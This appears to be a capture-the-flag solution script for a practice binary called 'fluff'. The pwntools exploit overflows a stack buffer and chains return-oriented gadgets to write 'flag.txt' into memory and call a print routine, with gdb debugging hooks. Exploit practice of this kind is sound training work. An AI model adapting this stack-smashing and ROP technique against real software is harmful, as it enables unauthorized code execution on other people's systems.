path: root/x86_64/fluff/exploit.py
#!/usr/bin/env python3
import struct

from pwn import *

# Per-character table consumed by write_str(): each entry is a 64-bit value
# from which a fixed offset is subtracted before it is packed into the chain.
# Only the characters of "flag.txt" are present, so write_str() raises
# KeyError for any other input string.
letter_lookups = dict(
    [
        ("f", 0x4003C4),
        ("l", 0x400239),
        ("a", 0x4003D6),
        ("g", 0x4003CF),
        (".", 0x400251),
        ("t", 0x400192),
        ("x", 0x400246),
    ]
)

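def write_str(dest, string, payload, lookups=None):
    """Append the chain fragment that places ``string`` at address ``dest``.

    The fragment is a fixed header (two words) followed by one seven-word
    group per character, emitted in string order. All constants are the
    binary-specific values from the original script and are not further
    identified here.

    Args:
        dest: Destination address for the string, packed once after the
            header word.
        string: Characters to write; each must be a key of ``lookups``.
        payload: Chain built so far (``bytes``). It is not modified in
            place; the extended chain is returned.
        lookups: Character -> integer table. Defaults to the module-level
            ``letter_lookups``; passing a table makes the helper reusable
            for other strings/binaries.

    Returns:
        ``payload`` with the fragment appended as little-endian unsigned
        64-bit words — the same encoding pwntools ``p64`` produces under the
        default context, but without depending on it.

    Raises:
        KeyError: if a character of ``string`` has no entry in ``lookups``.
    """
    table = letter_lookups if lookups is None else lookups
    pack = struct.Struct("<Q").pack
    parts = [payload, pack(0x4006A3), pack(dest)]
    for ch in string:
        try:
            # The 0x3ef2 adjustment is inherited from the original script;
            # its derivation is not documented here — confirm against the
            # target if the written bytes are wrong.
            value = table[ch] - 0x3EF2
        except KeyError:
            raise KeyError(f"no lookup entry for character {ch!r}") from None
        parts += [
            pack(0x40062A),
            pack(0x4000),  # if things go wrong, check endian/order
            pack(value),
            pack(0x400610),
            pack(0),
            pack(0x400628),
            pack(0x400639),
        ]
    return b"".join(parts)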
        

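# Launch the target under gdb with a breakpoint inside pwnme(); the +151
# offset comes from the original script and is specific to this binary.
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)

# 40 filler bytes precede the chain — presumably the distance to the saved
# return address; confirm at the breakpoint above if the chain misfires.
payload = b"a" * 40

# Stage 1: have the chain write "flag.txt" at 0x600df0 + 0xdf0 (= 0x601be0).
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)

# Stage 2: load rdi with the same address the string was written to, then
# return into 0x400510 (not further identified in this script).
payload += b"".join([
    p64(0x00000000004006a3),
    p64(0x601be0),  # set rdi
    p64(0x0000000000400510),
    b"\n",
])

# NOTE: the payload already ends with a newline and sendline() appends
# another; kept as in the original.
prog.sendline(payload)
sleep(1)
# Decode leniently: the target's output is not guaranteed to be valid UTF-8,
# and a UnicodeDecodeError here would abort the script before the
# interactive session opens.
print(prog.recv().decode("utf-8", errors="replace"))
prog.interactive()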